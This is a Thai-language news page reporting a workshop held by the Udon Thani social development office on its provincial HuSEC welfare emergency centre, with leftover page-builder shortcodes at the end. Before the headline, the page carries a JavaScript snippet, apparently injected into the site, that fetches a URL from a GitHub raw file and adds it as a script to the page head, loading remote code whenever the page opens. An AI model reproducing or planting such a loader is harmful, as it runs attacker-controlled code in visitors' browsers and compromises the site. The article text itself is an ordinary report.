;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); พม.อุดรธานี จัดประชุมเชิงปฏิบัติการยกระดับขับเคลื่อน ศรส. เพื่อพัฒนาศักยภาพการดำเนินงาน เสริมสร้างทักษะความรู้ ความเข้าใจของบุคลากรในหน่วยงาน - ThaiReference | อาสาไทยยืนยัน
พม.อุดรธานี จัดประชุมเชิงปฏิบัติการยกระดับขับเคลื่อน ศรส. เพื่อพัฒนาศักยภาพการดำเนินงาน เสริมสร้างทักษะความรู้ ความเข้าใจของบุคลากรในหน่วยงาน

ที่ โรงแรมเจริญโฮเต็ล อ.เมืองอุดรธานี จ.อุดรธานี นางสาวอนินทิตา รุจิประภา พัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอุดรธานี เป็นประธานเปิดการประชุมเชิงปฏิบัติการยกระดับขับเคลื่อนศูนย์เร่งจัดการสวัสดิภาพประชาชม(ศรส.) จังหวัดอุดรธานี ประจำปี พ.ศ. 2568 โดยมีหัวหน้าหน่วยงาน ข้าราชการ และเจ้าหน้าที่ ในสังกัดกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอุดรธานีเจ้าหน้าที่องค์กรปกครองส่วนท้องถิ่น อาสาพัฒนาสังคมและความมั่นคงของมนุษย์ในจังหวัด สื่อมวลชนในพื้นที่จังหวัด ผู้บริบาลผู้สูงอายุ และเจ้าหน้าที่ในสังกัดกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอุดรธานี และผู้นำชุมชนในพื้นที่จังหวัดอุดรธานี เข้าร่วมประชุม

นางสาวณัฐพร ยศสูงเป็น หัวหน้ากลุ่มการพัฒนาสังคมแสะสวัสดิการ กล่าวว่า กระพรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ ใต้จัดตั้งศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน (ศรส.) (Human Security Emergency Management HuSEC) เมื่อวันที่ 2 ตุลาคม 2566 เพื่อเป็นหน่วยงานกลางในการจัดการ ติดตามการดำเนินงานในการให้ความช่วยเหลือคุ้มครองสวัสดิภาพประชาชนกลุ่มเป้าหมาย ผู้ประสบปัญหาทางสังคมในระดับประเทศ และเมื่อวันที่ 8 มกราคม 2567 นายวราวุธ ศิลปอาชา รัฐมนตรีว่าการกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์ (รมว.พม.) ได้มีนโยบายจัดตั้งทีม ศรส.ระดับจังหวัดทั่วประเทศ เน้นการช่วยเหลือคุ้มครองสวัสดิภาพประชาชน และกลุ่มเป้าหมายให้เป็นไปด้วยความรวดเร็วมีประสิทธิภาพ รวมทั้งการประชาสัมพันธ์และการสื่อสารสังคมเชิงรุก เพื่อสร้างทุกภาคส่วนให้มีส่วนร่วมในการป้องกันและแก้ไขปัญหาทางสังคม มีการจัดตั้งทีมปฏิบัติการหน่วยเคลื่อนที่เร็ว ทีมสหวิชาชีพ และภาคีเครือข่าย ร่วมปฏิบัติการในการขับเคลื่อนงานศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน

ศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน (ศรส.) มีกระบวนการทำงานเชิงระบบ ประกอบด้วย Input : ช่องทางผู้รับบริการเข้าถึง เช่น ศูนย์ช่วยเหลือสังคมสายด่วน 1300 Line OA ESS Help Me Social Media ตู้ ปณ 11111 ศูนย์ดำรงธรรม 1567 หรือ Walk in Process : กระบวนการให้ความช่วยเหลือ การติดตามและยุติเรื่อง และการรวบรวมข้อมูล วิเคราะห์ โดยมีข้อมูลทางวิชาการสนับสนุน Output : มีการรายงานผลการช่วยเหลือดามประเด็นปัญหา เช่น ความรุนแรง รายได้ ความเป็นอยู่ ตามประเภทความช่วยเหลือ ในการให้คำแนะนำ ส่งต่อ ความพึงพอใจของผู้รับบริการและการสื่อสารสาธารณะ Outcome : ผลลัพธ์ ประชาชนมีความเป็นอยู่ที่ดีขึ้น สังคมเข้ามามีส่วนร่วมในการขี้เป้าเฝ้าระวังปัญหา

สำนักงานพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดสุดสุดรธานี ในฐานะที่ประธานคณะทำงานขับเคลื่อนศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน จังหวัดอุดอุดรธานีเป็นหน่วยงานที่สนับสนุน กำกับ ติดตามการขับเคลื่อนการให้ความช่วยเหลือคุ้มครองสวัสดิภาพประชาชนและกลุ่มเป้าหมายผู้ประสบปัญหาทางสังคม วิเคราะห์สถานการณ์ปัญหาสังคมที่สำคัญเร่งด่วน รวมถึงต้องมีการสื่อสารสังคมเชิงรุก เพื่อนำเสนอผลการดำเนินงานของศูนย์เร่งรัดจัดการสวัสดิภาพของประชาชนให้เห็นเป็นรูปธรรมและเผยแพร่ประชาสัมพันธ์ผ่านทางช่องต่างๆ และการรณรงค์ให้ประชาชนเกิดความรู้สึกมีส่วนร่วมในการดูแลสังคมต่อไปจึงได้จัดโครงการประชุมเชิงปฏิบัติการทีมปฏิบัติการศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน (ศรส.) จังหวัดอุดรธานีจัดขึ้น โดยมีวัตถุประสงค์เพื่อพัฒนาศักยภาพการดำเนินงาน เสริมสร้างทักษะความรู้ความเข้าใจของบุคลากรในหน่วยงานสังกัดกระทรวงการพัฒนาสังคมและความมั่นคงของมนุษย์จังหวัดอุดรธานี ประสานความร่วมมือส่งเสริมการจัดสวัสดิการสังคม เพื่อให้ประชาชน กลุ่มเป้าหมายตามภารกิจของกระทรวง พม. เข้าถึงสิทธิที่ได้รับตามภารกิจกระทรวงฯ สร้างความตระหนักรู้ในสังคม ด้วยการสื่อสารประชาสัมพันธ์สถานการณ์ทางสังคมเชิงรุกและเพื่อเสริมสร้างภาพลักษณ์องค์กรที่ดีของศูนย์เร่งรัดจัดการสวัสดิภาพประชาชน (ศรส.)ในการช่วยเหลือและคุ้มครองสวัสดิภาพประชาชน โดยเฉพาะประชาชนทุกกลุ่มเป้าหมายที่ประสบปัญหาความเดือดร้อนทางสังคม

[dsm_icon_divider use_icon=”on” font_icon=”||divi||400″ use_icon_font_size=”on” icon_font_size=”25px” divider_style=”dashed” _builder_version=”4.25.2″ _module_preset=”default” module_alignment=”center” global_colors_info=”{}”][/dsm_icon_divider]
[dsm_blog_carousel posts_number=”20″ posts_offset=”1″ include_categories=”3,5,4″ use_date=”off” use_category=”on” use_author=”off” use_readmore=”on” readmore_text=”อ่านเพิ่ม…” post_equal_height=”on” _builder_version=”4.25.2″ _module_preset=”default” title_font_size=”25px” min_height=”482px” custom_margin=”||639px||false|false” custom_padding=”||340px|||” global_colors_info=”{}”][/dsm_blog_carousel]